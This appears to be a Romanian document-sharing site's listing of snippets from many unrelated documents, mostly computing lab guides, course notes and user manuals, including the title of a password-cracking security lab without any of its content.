Mic ghid de folosire a Gmail

Mic ghid de folosire a Gmail GHID Gmail Daca aveti un cont (adresa) mail la Google de exemplu: ion.xulescu@gmail sau IoN.xuLescu@googlemail este de preferat sa-l accesati cu un browser (navigator) internet. Remarca. Pentru adresa

Mai mult

SSA07r [Compatibility Mode]

SSA07r [Compatibility Mode] Ce este unix? Securitatea sistemelor şi a aplicaţiilor Cursul VII. Securitatea SO. Unix Marius Joldoş U.T. Cluj-Napoca SO multiutilizator cu acces din reţea Are o istorie de peste 30 de ani Dezvoltarea

Mai mult

Laborator02

Laborator02 Universitatea Politehnica București Catedra de Calculatoare Laborator 2 Introducere în SQL și SQL*Plus Autori Conf. Dr. Ing. Alexandru Boicea Ș.L. Dr. Ing. Ciprian-Octavian Truică Cuprins SQL*Plus SQL

Mai mult

Analiză de flux de date 29 octombrie 2012

Analiză de flux de date 29 octombrie 2012 Analiză de flux de date 29 octombrie 2012 Analiză statică: definiţie O analiză a codului sursă (fără a executa programul), cu scopul de a determina proprietăţi ale programului sursă. (in principal corectitudinea,

Mai mult

Laborator Depanarea Rutării Inter-VLAN Topologie 2013 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public. Page 1 of 8

Laborator Depanarea Rutării Inter-VLAN Topologie 2013 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public. Page 1 of 8 Laborator Depanarea Rutării Inter-VLAN Topologie 2013 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public. Page 1 of 8 Tabela de Adresare Echipament Interfață Adresă IP Masca

Mai mult

Laborator - Configurarea de bază DHCPv4 pe un router Topologie Tabela de Adresare Echipame nt Interfață Adresă IP Masca de subreţea Default Gateway Ob

Laborator - Configurarea de bază DHCPv4 pe un router Topologie Tabela de Adresare Echipame nt Interfață Adresă IP Masca de subreţea Default Gateway Ob Topologie Tabela de Adresare Echipame nt Interfață Adresă IP Masca de subreţea Default Gateway Obiective R1 G0/0 192.168.0.1 255.255.255.0 N/A G0/1 192.168.1.1 255.255.255.0 N/A S0/0/0 (DCE) 192.168.2.253

Mai mult

Instrumentul UE de stabilire a profilului de competențe al resortisanților din țările terțe MANUAL DE UTILIZARE Versiunea 1: 6 noiembrie 2017 Europa s

Instrumentul UE de stabilire a profilului de competențe al resortisanților din țările terțe MANUAL DE UTILIZARE Versiunea 1: 6 noiembrie 2017 Europa s Instrumentul UE de stabilire a profilului de competențe al resortisanților din țările terțe MANUAL DE UTILIZARE Versiunea 1: 6 noiembrie 2017 Europa socială Cuprins 1. SCOPUL INSTRUMENTULUI... 3 2. UTILIZATORII...

Mai mult

e-learning Agronomie Platforma de e-learning Versiunea: Ghid de utilizare Beneficiar: UNIVERSITATEA DE STIINTE AGRONOMICE SI MEDICINA VETERINARA

e-learning Agronomie Platforma de e-learning Versiunea: Ghid de utilizare Beneficiar: UNIVERSITATEA DE STIINTE AGRONOMICE SI MEDICINA VETERINARA Platforma de e-learning Versiunea: 2.0.1 Ghid de utilizare Beneficiar: UNIVERSITATEA DE STIINTE AGRONOMICE SI MEDICINA VETERINARA DIN BUCURESTI Data: 03.10.2018 Rev: 1.0 1 Contents 1. Introducere... 3

Mai mult

Paradigme de programare

Paradigme de programare Curs 4 Transparență referențială. Legare statică / dinamică. Modelul contextual de evaluare. Transparență referențială Cuprins Efecte laterale Transparență referențială 2 Efecte laterale Efecte laterale

Mai mult

Microsoft Word - Laborator 6 - Expresii Regulate IV.doc

Microsoft Word - Laborator 6 - Expresii Regulate IV.doc PERL Laborator 6 Adrian Iftene Martie 26, 2007 1 1 Greşeli Comune când lucrăm cu RegExp... 3 2 Câteva Subiecte mai Avansate... 3 2.1 Comentarii Inline... 4 2.2 Modificatori Inline... 4 2.3 Gruparea fără

Mai mult

Managementul Resurselor Umane

Managementul Resurselor Umane Universitatea Politehnica București Catedra de Calculatoare Laborator 4 Cereri SQL Autori Conf. Dr. Ing. Alexandru Boicea Ș.L. Dr. Ing. Ciprian-Octavian Truică Cuprins Cereri SQL Cereri simple 10.03.2019

Mai mult

RZOLVARE EXERCITIU ZODII declare cursor distributie_zodie is select nume_zodie, count(*) distributie from zodiac z join utilizatori u on to_date(to_ch

RZOLVARE EXERCITIU ZODII declare cursor distributie_zodie is select nume_zodie, count(*) distributie from zodiac z join utilizatori u on to_date(to_ch RZOLVARE EXERCITIU ZODII declare cursor distributie_zodie is select nume_zodie, count(*) distributie from zodiac z join utilizatori u on to_date(to_char(u.data_nastere, 'DD-MM'), 'DD-MM') between to_date(z.data_inceput,

Mai mult

Microsoft Word - O problema cu bits.doc

Microsoft Word - O problema cu bits.doc O problemă cu bits 1 Tiberiu Socaciu Enunţul Pe pagina Proful de Mate de pe Facebook 2 am primit de la un elev de clasa a IX-a următoarea provocare 3 : Vom oferi două soluţii, una folosind manipulări de

Mai mult

Microsoft Word - Politică de cookie-uri OK_v1.docx

Microsoft Word - Politică de cookie-uri OK_v1.docx Politică de cookie-uri 1. CE ESTE UN COOKIE? 2. CARE SUNT AVANTAJELE COOKIE-URILOR? 3. DE CE FOLOSIM COOKIE-URI? 4. CUM SUNT FOLOSITE COOKIE-URILE PE ACESTE SITE? 5. CE TIP DE INFORMAȚII SUNT STOCATE ȘI

Mai mult

Laborator 4: Continuare Programare Orientată pe Obiecte Întocmit de: Adina Neculai Îndrumător: Asist. Drd. Gabriel Danciu 29 octombrie 2011

Laborator 4: Continuare Programare Orientată pe Obiecte Întocmit de: Adina Neculai Îndrumător: Asist. Drd. Gabriel Danciu 29 octombrie 2011 Laborator 4: Continuare Programare Orientată pe Obiecte Întocmit de: Adina Neculai Îndrumător: Asist. Drd. Gabriel Danciu 29 octombrie 2011 I. NOŢIUNI TEORETICE A. Suprascrierea metodelor O clasă derivată

Mai mult

... MANAGER SERVICE UTILAJE - Aplicatie software pentru gestiune service utilaje - MANUALUL UTILIZATORULUI OFERTE Folositi acest meniu daca dori

... MANAGER SERVICE UTILAJE - Aplicatie software pentru gestiune service utilaje - MANUALUL UTILIZATORULUI OFERTE Folositi acest meniu daca dori ... MANAGER SERVICE UTILAJE - Aplicatie software pentru gestiune service utilaje - MANUALUL UTILIZATORULUI... 1. OFERTE Folositi acest meniu daca doriti sa trimiteti o oferta catre un client nou sau unul

Mai mult

Lucrarea 10

Lucrarea 10 Lucrarea 10. Studierea facilitatilor senzoriale, de calcul si de comunicatie ale unei placi de tip Arduino 1. Obiectivul lucrarii Lucrarea isi propune sa prezinte facilitatile de calcul, senzoriale si

Mai mult

Minicurs CCS C / Aplicatia1 1.Programul CCS C Compiler. Instalare.Creare proiect. Descarcati ultima versiune a programului de

Minicurs CCS C / Aplicatia1   1.Programul CCS C Compiler. Instalare.Creare proiect. Descarcati ultima versiune a programului de Minicurs CCS C / Aplicatia1 www.roboprog.weebly.com 1.Programul CCS C Compiler. Instalare.Creare proiect. Descarcati ultima versiune a programului de la adresa : http://www.ccsinfo.com/compdemo.php Instalati

Mai mult

Ghid de instalare ebook Pentru a accesa ebook-ul trebuie să creați un cont pe raftul de cărți VitalSource (Bookshelf account) iar apoi să introduceți

Ghid de instalare ebook Pentru a accesa ebook-ul trebuie să creați un cont pe raftul de cărți VitalSource (Bookshelf account) iar apoi să introduceți Ghid de instalare ebook Pentru a accesa ebook-ul trebuie să creați un cont pe raftul de cărți VitalSource (Bookshelf account) iar apoi să introduceți codul de acces furnizat. Puteți de asemenea să descărcați

Mai mult

metro-privacy

metro-privacy Declarația generală privind protecția datelor pentru aplicația "METRO Companion" Prin intermediul aplicației METRO Companion (denumită în continuare "Aplicatia"),, Metro- Straße 1, 40235 Düsseldorf (denumită

Mai mult

Example Title with Registration Microsoft® and Trademark SQL ServerTM

Example Title with Registration Microsoft® and Trademark  SQL ServerTM 802.1x şi NAP 12 aprilie 2010 Cuprins EAP 802.1x Supplicant Pass-through authenticator Authentication server NAP Client Server 802.1x şi NAP 2 Extensible Authentication Protocol Standard IETF (RFC 3748)

Mai mult

Lucrarea nr. 2 Aplicaţii de tip client Mihai IVANOVICI 6 martie 2006 Scopul acestei lucrări este de a vă familiariza cu modulul Python socket şi cu mo

Lucrarea nr. 2 Aplicaţii de tip client Mihai IVANOVICI 6 martie 2006 Scopul acestei lucrări este de a vă familiariza cu modulul Python socket şi cu mo Lucrarea nr. 2 Aplicaţii de tip client Mihai IVANOVICI 6 martie 2006 Scopul acestei lucrări este de a vă familiariza cu modulul Python socket şi cu modul de implementare al unei aplicaţii de tip client.

Mai mult

Laborator5- ASR

Laborator5- ASR Universitatea Politehnica Bucuresti Facultatea de Automatica si Calculatoare Master Securitatea Retelelor Informatice Complexe Auditarea Securitatii Retelelor Laborator 5 Spargerea parolelor Adrian Furtună,

Mai mult

A.E.F. - suport laborator nr.5 sem.ii Analiza suprafețelor prin utilizarea elementelor 2D În acest laborator sunt atinse următoarele aspecte: realizar

A.E.F. - suport laborator nr.5 sem.ii Analiza suprafețelor prin utilizarea elementelor 2D În acest laborator sunt atinse următoarele aspecte: realizar Analiza suprafețelor prin utilizarea elementelor 2D În acest laborator sunt atinse următoarele aspecte: realizarea manuală a rețelelor discretizate utilizarea elementelor 2d într-o analiză aplicarea unei

Mai mult

‍ Manual de utilizare Wi-Fi Direct Versiunea A ROM Modelele aplicabile Acest ghid al utilizatorului este valabil pentru modelele următoare: DCP-J4110DW, MFC-J4410DW/J4510DW/J4610DW Definiţii ale notelor

Mai mult

Nr.înregistrare: 88 / Social Media in the Classroom Prof.Cucuianu Marița Colegiul Național,,Neagoe Basarab"Oltenița,jud.Călărași 2.Quizizz E

Nr.înregistrare: 88 / Social Media in the Classroom Prof.Cucuianu Marița Colegiul Național,,Neagoe BasarabOltenița,jud.Călărași 2.Quizizz E Nr.înregistrare: 88 /21.01.2019 Social Media in the Classroom Prof.Cucuianu Marița Colegiul Național,,Neagoe Basarab"Oltenița,jud.Călărași 2.Quizizz Este o platformă unde se găsesc teste gata făcute sau

Mai mult

Manual de utilizare a Sistemului Informațional al Institutului Național al Justiției (SI INJ) intranet.inj.md Ver.2 Manual de utilizare a Sistemului I

Manual de utilizare a Sistemului Informațional al Institutului Național al Justiției (SI INJ) intranet.inj.md Ver.2 Manual de utilizare a Sistemului I Manual de utilizare a Sistemului Informațional al Institutului Național al Justiției (SI INJ) intranet.inj.md Ver.2 Manual de utilizare a Sistemului Informațional al Institutului Național al Justiției

Mai mult

Web Social FSEGA, UBB Lect.univ.dr. Daniel Mican LABORATOR 2. Dezvoltarea blogurilor prin intermediul WordPress.com PREZE

Web Social FSEGA, UBB Lect.univ.dr. Daniel Mican LABORATOR 2. Dezvoltarea blogurilor prin intermediul WordPress.com PREZE LABORATOR 2. Dezvoltarea blogurilor prin intermediul WordPress.com PREZENTAREA LUCRARII DE LABORATOR Lucrarea de laborator isi propune sa prezinte modul de creare a blogurilor cu wordpress.com. WordPress

Mai mult

Gestionarea I/E

Gestionarea I/E Gestionarea I/E Apelurile de sistem I/O in Linux si apelurile API de I/E pentru Windows Herea Cristian 431 A 1. Linux Apeluri de sistem (system calls) Sistemele de operare au un nivel suplimentar de interfete

Mai mult

Curs 10 - Automatizarea scalabila a sistemelor

Curs 10 - Automatizarea scalabila a sistemelor Curs 10 Automatizarea scalabilă a sistemelor Servicii avansate pentru ISP 16 mai 2017 SAISP Curs 10, Automatizarea scalabilă a sistemelor 1/38 Outline Ce reprezintă o infrastructură? Administrarea unei

Mai mult

Proiectarea Sistemelor Software Complexe

Proiectarea Sistemelor Software Complexe Proiectarea Sistemelor Software Complexe Curs 4 Arhitecturi de Sistem Software Bazate pe Tehnologii Middleware. Obiecte Distribuite. Rolul unui arhitect software este foarte asemănător cu cel al unui arhitect

Mai mult

ID DE EXERCIȚII PENTRU CLASELE NUME: Să ne jucăm de-a lucrarea de control 1h PENTRU CLASA: Toate clasele DURATĂ: 1h explicații + realizarea ex

ID DE EXERCIȚII PENTRU CLASELE NUME: Să ne jucăm de-a lucrarea de control 1h PENTRU CLASA: Toate clasele DURATĂ: 1h explicații + realizarea ex 024 NUME: Să ne jucăm de-a lucrarea de control 1h PENTRU CLASA: Toate clasele DURATĂ: 1h explicații + realizarea exercițiului de către elevi NECESAR: smartphone/tablete (în cazul în care nu toți elevi

Mai mult

Microsoft Word - CarteC.doc

Microsoft Word - CarteC.doc Introducere în limbajul de programare C - C este un limbaj de programare ale cărui caracteristici sunt economia de expresie, structuri moderne de control al fluxului şi de date, precum şi un set bogat

Mai mult

Declararea variabilelor

Declararea variabilelor Platforma 3. 1 Instructiuni diverse Declararea variabilelor Tipuri de Date Tipul de dată al unui obiect/variabila specifica tipul informaţiei pe care acel obiect îl poate stoca. Exemplu: numere întregi,

Mai mult

Ghid de asistenţă Aparat de comandă pentru aparatul foto CCB-WD1 Ghidul de asistenţă conţine instrucţiuni privind modul de utilizare a produsului sau

Ghid de asistenţă Aparat de comandă pentru aparatul foto CCB-WD1 Ghidul de asistenţă conţine instrucţiuni privind modul de utilizare a produsului sau Ghid de asistenţă Aparat de comandă pentru aparatul foto CCB-WD1 Ghidul de asistenţă conţine instrucţiuni privind modul de utilizare a produsului sau a aparatului foto conectat la produs prin intermediul

Mai mult

Addendum Syllabus 6 Microsoft Word 2016 REF Syllabus 6.0 Crearea unui document nou pe baza unor șabloane disponibile local sau online Microsoft

Addendum Syllabus 6 Microsoft Word 2016 REF Syllabus 6.0 Crearea unui document nou pe baza unor șabloane disponibile local sau online Microsoft REF 1.1.2 Syllabus 6.0 Crearea unui document nou pe baza unor șabloane disponibile local sau online Microsoft Word vă permite să creați documente cu un aspect profesional folosind șabloanele existente.

Mai mult

GHID PENTRU RESETAREA PAROLEI Informații Generale Din dorința de a facilita procesul de autentificare, chiar dacă nu mai cunoașteti datele necesare, a

GHID PENTRU RESETAREA PAROLEI Informații Generale Din dorința de a facilita procesul de autentificare, chiar dacă nu mai cunoașteti datele necesare, a GHID PENTRU RESETAREA PAROLEI Informații Generale Din dorința de a facilita procesul de autentificare, chiar dacă nu mai cunoașteti datele necesare, au fost implementate 2 opțiuni de resetare automată

Mai mult

Laborator 2: Instrucţiuni Java şi lucru cu şiruri de caractere Întocmit de: Adina Neculai Îndrumător: Asist. Drd. Gabriel Danciu 18 octombrie 2011

Laborator 2: Instrucţiuni Java şi lucru cu şiruri de caractere Întocmit de: Adina Neculai Îndrumător: Asist. Drd. Gabriel Danciu 18 octombrie 2011 Laborator 2: Instrucţiuni Java şi lucru cu şiruri de caractere Întocmit de: Adina Neculai Îndrumător: Asist. Drd. Gabriel Danciu 18 octombrie 2011 I. NOŢIUNI TEORETICE A. Instrucţiuni condiţionale 1. Intrucţiunea

Mai mult

Operatorii in C Expresii Operatori aritmetici Operatori de asignare Operatori de incrementare si decrementare Operatori relationali Operatori logici O

Operatorii in C Expresii Operatori aritmetici Operatori de asignare Operatori de incrementare si decrementare Operatori relationali Operatori logici O Operatorii in C Expresii Operatori aritmetici Operatori de asignare Operatori de incrementare si decrementare Operatori relationali Operatori logici Operatii pe biti Operatorul conditional Operatori Logici

Mai mult

Procesarea Imaginilor - Laborator 1: Introducere în utilizarea bibliotecii OpenCV 1 1. Introducere în utilizarea bibliotecii OpenCV 1.1. Introducere S

Procesarea Imaginilor - Laborator 1: Introducere în utilizarea bibliotecii OpenCV 1 1. Introducere în utilizarea bibliotecii OpenCV 1.1. Introducere S Procesarea Imaginilor - Laborator 1: Introducere în utilizarea bibliotecii OpenCV 1 1. Introducere în utilizarea bibliotecii OpenCV 1.1. Introducere Scopul acestei lucrări de laborator este de a familiariza

Mai mult

Laborator Activities În sistemul Android activitățile reprezintă echivalentul ferestrelor din Windows, fiind clase care extind clasa Activity. Spre de

Laborator Activities În sistemul Android activitățile reprezintă echivalentul ferestrelor din Windows, fiind clase care extind clasa Activity. Spre de Laborator Activities În sistemul Android activitățile reprezintă echivalentul ferestrelor din Windows, fiind clase care extind clasa Activity. Spre deosebire de alte sisteme, în Android ecranul este mereu

Mai mult

MANUAL ULTRA ORIENTEERING CLASAMENTE SOFTWARE VERSION 1.0

MANUAL ULTRA ORIENTEERING CLASAMENTE SOFTWARE VERSION 1.0 MANUAL ULTRA ORIENTEERING CLASAMENTE SOFTWARE VERSION 1.0 De stiut: 1) In cazul in care aveti skype pe calculator trebuie sa intrati in aplicatie in Options > Advenced > Connextion si sa debifati folosirea

Mai mult

Slide 1

Slide 1 Cursul 1 1 Introducere 06 Octombrie 2008 Motto If you can t explain it simply, you don t understand it well enough. Albert Einstein 04.10.08 2 Ce este un sistem de operare? Un sistem de operare este un

Mai mult

Diapositive 1

Diapositive 1 Tablouri Operatii pe tablouri bidimensionale Lectii de pregatire pentru Admitere 09 / 03 / 2019 1 Cuprins Operatii pe tablouri bidimensionale 0. Tablouri unidimensionale scurta recapitulare 1.Tablouri

Mai mult

Microsoft PowerPoint - ImplementareLimbaj [Read-Only] [Compatibility Mode]

Microsoft PowerPoint - ImplementareLimbaj [Read-Only] [Compatibility Mode] Detalii de implementare. Declararea variabilelor, transmiterea parametrilor catre subprograme. Declararea variabilelor variabile globale -declarate in afara oricarei functii variabile locale -declarate

Mai mult

Creational design patterns

Creational design patterns Unit Testing: CORRECT ALIN ZAMFIROIU Recapitulare Testing Unit testing Junit Test TestCase TestSuite Assertion Right-BICEP Test QUIZ.CSIE.ASE.RO CORRECT C Conformitatea formatului (Conformance); O Ordinea

Mai mult

Aggregating Data

Aggregating Data Subinterogări. Subinterogări multi-row. Formatarea rezultatelor unei interogări Obiective Prin parcurgerea acestui referat studentul va dobândi cunoştinţele necesare: identificării funcţiilor grup disponibile;

Mai mult

manual_ARACIS_evaluare_experti_v4

manual_ARACIS_evaluare_experti_v4 PLATFORMĂ DE EVALUARE ONLINE PENTRU EXPERȚII ARACIS Page 1 CUPRINS Cap 1. Procesul de evaluare 3 Cap 2. Procedura de înregistrare și evaluare 3 cap 3. Instrucțiuni de completare a formularului de înregistrare

Mai mult

Proceduri stocate Syntax: CREATE PROCEDURE <Name> type1,...] AS -- secventa de comenzi SQL GO O procedura stocata se ruleaza cu EXEC: EXEC <N

Proceduri stocate Syntax: CREATE PROCEDURE <Name> type1,...] AS -- secventa de comenzi SQL GO O procedura stocata se ruleaza cu EXEC: EXEC <N Proceduri stocate Syntax: CREATE PROCEDURE [@param1 type1,...] -- secventa de comenzi SQL O procedura stocata se ruleaza cu EXEC: EXEC Modificarea unei proceduri: ALTER PROCEDURE [@param1

Mai mult

Prezentare KICK OFF MEETING

Prezentare KICK OFF MEETING Document Name SADs Agreement: 589583-EPP-1-2017-1-NO-EPPKA2-CBY-ACPALA PREZENTARE KICK OFF MEETING Author: Zepisi Simona Valinda The Consortium: P.1. Terram Pacis - Norway P.2. Comitato d'intesa - Italy

Mai mult

Damoc Alina Timofte Maria 1. Rezumat: Implementarea unui dispozitiv ce permite verificarea tempe

Damoc Alina Timofte Maria 1. Rezumat: Implementarea unui dispozitiv ce permite verificarea tempe Damoc Alina (damoc.alina93@gmail.com) Timofte Maria (maria.a.timofte@gmail.com) 1. Rezumat: Implementarea unui dispozitiv ce permite verificarea temperaturii dintr-o camera. Resurse materiale: FRDM KL25Z,Raspberry

Mai mult

Facultatea de Științe Politice, Administrative și ale Comunicării Str. Traian Moșoiu nr. 71 Cluj-Napoca, RO Tel.: Fax:

Facultatea de Științe Politice, Administrative și ale Comunicării Str. Traian Moșoiu nr. 71 Cluj-Napoca, RO Tel.: Fax: Documentație pentru accesarea platformei e-learning de către studenți Pentru facilitarea demersurilor necesare bunei desfășurări a cursurilor se folosește platforma de e-learning a facultății (care se

Mai mult